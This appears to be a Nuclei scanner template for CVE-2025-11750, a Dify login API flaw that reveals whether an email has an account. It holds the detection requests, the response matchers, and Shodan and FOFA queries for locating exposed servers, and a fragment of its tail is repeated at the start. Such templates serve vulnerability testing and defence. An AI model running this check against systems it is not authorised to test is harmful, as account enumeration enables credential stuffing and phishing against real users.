Dify")' - "status_code == 200" condition: and internal: true - raw: - | POST /console/api/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"email":"{{fake_email}}","password":"{{fake_password}}","language":"en-EN","remember_me":true} matchers: - type: dsl dsl: - 'contains_all(body, "account_not_found", "message")' - 'contains(content_type, "application/json")' - 'status_code == 400' condition: and # digest: 4a0a00473045022100fe013d1d3ac5082d23151fb2703594e7dfa38cc04c9d6af149f12bc1a8fcdf39022007deb67d4c06ca76cfa30db25296b5848916aacb75863f2f82ea7da2f329fab7:922c64590222798bb761d5b6d8e72950

id: CVE-2025-11750 info: name: Dify - User Enumeration via "Account not found" Message author: Kazgangap severity: medium description: | A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts. impact: | Attackers can enumerate valid user accounts through distinct error messages returned by the login API, facilitating targeted credential stuffing and phishing attacks against Dify installations. remediation: | Upgrade to the patched version of Dify that implements generic error messages for authentication failures. reference: - https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1 - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11750.md - https://github.com/langgenius/dify/issues/24323 - https://github.com/langgenius/dify/pull/25369 metadata: verified: true vendor: langgenius product: dify shodan-query: http.favicon.hash:"97378986" fofa-query: icon_hash="97378986" tags: cve,cve2025,langgenius,dify,user-enum,vuln variables: fake_email: "{{to_lower(rand_text_alphanumeric(16))}}@{{to_lower(rand_text_alphanumeric(16))}}.com" fake_password: "{{rand_text_alphanumeric(16)}}" flow: http(1) && http(2) http: - raw: - | GET /signin HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'contains(body, "Dify")' - "status_code == 200" condition: and internal: true - raw: - | POST /console/api/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"email":"{{fake_email}}","password":"{{fake_password}}","language":"en-EN","remember_me":true} matchers: - type: dsl dsl: - 'contains_all(body, "account_not_found", "message")' - 'contains(content_type, "application/json")' - 'status_code == 400' condition: and # digest: 4a0a00473045022100fe013d1d3ac5082d23151fb2703594e7dfa38cc04c9d6af149f12bc1a8fcdf39022007deb67d4c06ca76cfa30db25296b5848916aacb75863f2f82ea7da2f329fab7:922c64590222798bb761d5b6d8e72950